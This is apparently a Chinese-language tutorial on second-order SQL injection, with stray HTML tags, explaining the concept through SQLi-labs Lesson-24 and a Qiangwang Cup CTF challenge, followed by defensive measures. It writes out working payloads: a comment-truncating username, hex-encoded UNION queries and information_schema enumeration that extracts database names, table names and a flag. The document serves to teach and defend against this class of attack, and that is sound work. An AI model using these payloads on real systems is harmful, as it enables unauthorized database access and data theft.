二次注入技术详解<\/h1>

一、二次注入基本概念<\/h2>

定义<\/strong>：二次注入是指已存储(数据库、文件)的用户输入被读取后再次进入到SQL查询语句中导致的注入攻击。<\/p>

特点<\/strong>：<\/p>

比普通SQL注入利用更困难，门槛更高<\/li>
攻击过程分为两个阶段：数据存储阶段和数据使用阶段<\/li>
通常绕过前端直接输入过滤<\/li> <\/ul>
二、二次注入原理<\/h2>

第一阶段<\/strong>：攻击者提交恶意数据<\/p>

数据经过转义处理(如addslashes、mysql_real_escape_string等)<\/li>
转义后的"安全"数据被存入数据库<\/li>
但数据库中存储的是原始恶意数据(转义被还原)<\/li> <\/ul> <\/li>

第二阶段<\/strong>：程序使用存储的数据<\/p>

程序从数据库取出"可信"数据<\/li>
未进行二次检验和处理<\/li>
直接拼接到SQL查询中执行<\/li> <\/ul> <\/li> <\/ol>
关键点<\/strong>：开发者错误认为存入数据库的数据就是安全的，忽略了从数据库取出时的再检验。<\/p>
三、二次注入实例分析<\/h2>
实例1：SQLIlab Lesson-24<\/h3>
攻击流程<\/strong>：<\/p>

注册特殊用户名：test'#<\/code><\/p>
注册时经过mysql_escape_string<\/code>转义<\/li> 但数据库中存储原始值test'#<\/code><\/li> <\/ul> <\/li> 使用test'#<\/code>登录并修改密码<\/p> 实际执行的SQL： UPDATE<\/span> users SET<\/span> PASSWORD=<\/span>'22'<\/span> where<\/span> username=<\/span>'test'<\/span>#<\/span>' and password='<\/span>$<\/span>curr_pass' <\/span><\/span><\/span><\/code><\/pre><\/li> #<\/code>注释掉后续密码验证条件<\/li> 结果修改了test<\/code>用户的密码而非test'#<\/code>的密码<\/li> <\/ul> <\/li> <\/ol> 漏洞根源<\/strong>：<\/p> 从数据库取出用户名时未做处理<\/li> 直接拼接到UPDATE语句中<\/li> <\/ul> 实例2：强网杯"three hit"题目<\/h3> 环境特点<\/strong>：<\/p> 用户名限制：0-9a-zA-Z<\/li> age限制：只能是数字<\/li> 但age支持十六进制表示<\/li> <\/ul> 攻击流程<\/strong>：<\/p> 发现注入点<\/strong>：<\/p> 通过.index.php.swp<\/code>获取源码<\/li> 发现age字段使用is_numeric<\/code>检查，可用十六进制绕过<\/li> <\/ul> <\/li> 验证注入<\/strong>：<\/p> 注册age为0x3120616e6420313d3123<\/code>(1 and 1=1#)<\/li> 注册age为0x3120616e6420313d3223<\/code>(1 and 1=2#)<\/li> 观察返回结果差异确认注入存在<\/li> <\/ul> <\/li> 探测列数<\/strong>：<\/p> 注册age为0x31206f72646572206279203423<\/code>(1 order by 4#) → 成功<\/li> 注册age为0x31206f72646572206279203523<\/code>(1 order by 5#) → 失败<\/li> 确定列数为4<\/li> <\/ul> <\/li> 利用UNION注入<\/strong>：<\/p> 确定显示位： 1<\/span> and<\/span> 1<\/span>=<\/span>2<\/span> union<\/span> select<\/span> 1<\/span>,2<\/span>,3<\/span>,4<\/span>#<\/span> <\/span><\/span><\/code><\/pre><\/li> 发现第2列可用于显示<\/li> <\/ul> <\/li> 数据泄露<\/strong>：<\/p> 爆数据库名： 1<\/span> and<\/span> 1<\/span>=<\/span>2<\/span> union<\/span> select<\/span> 1<\/span>,group_concat(schema_name<\/span>),3<\/span>,4<\/span> from<\/span> information_schema.schemata#<\/span> <\/span><\/span><\/code><\/pre><\/li> 爆表名： 1<\/span> and<\/span> 1<\/span>=<\/span>2<\/span> union<\/span> select<\/span> 1<\/span>,group_concat(table_name<\/span>),3<\/span>,4<\/span> from<\/span> information_schema.tables where<\/span> table_schema=<\/span>'qwb'<\/span>#<\/span> <\/span><\/span><\/code><\/pre><\/li> 最终获取flag： 19<\/span> and<\/span> 1<\/span>=<\/span>2<\/span> union<\/span> select<\/span> null<\/span>,concat(flag),null<\/span>,null<\/span> from<\/span> flag#<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 四、防御措施<\/h2> 输入处理<\/strong>：<\/p> 不仅对直接输入过滤，对从数据库取出的数据也要过滤<\/li> 使用参数化查询(Prepared Statements)<\/li> <\/ul> <\/li> 数据存储<\/strong>：<\/p> 考虑存储转义后的数据<\/li> 或标记不可信数据的来源<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 数据库用户最小权限原则<\/li> 避免使用高权限账户连接数据库<\/li> <\/ul> <\/li> 代码审计<\/strong>：<\/p> 检查所有从数据库取出数据的处理流程<\/li> 特别注意数据拼接SQL语句的位置<\/li> <\/ul> <\/li> <\/ol> 五、总结<\/h2> 二次注入是一种需要两个阶段完成的SQL注入攻击，其特点在于：<\/p> 绕过初次输入过滤<\/li> 利用开发者对数据库数据的信任<\/li> 通常需要结合应用逻辑进行分析<\/li> <\/ul> 防御关键在于建立"数据无论来自何处都不可信"的安全意识，对所有用于构建SQL语句的数据进行严格处理。<\/p>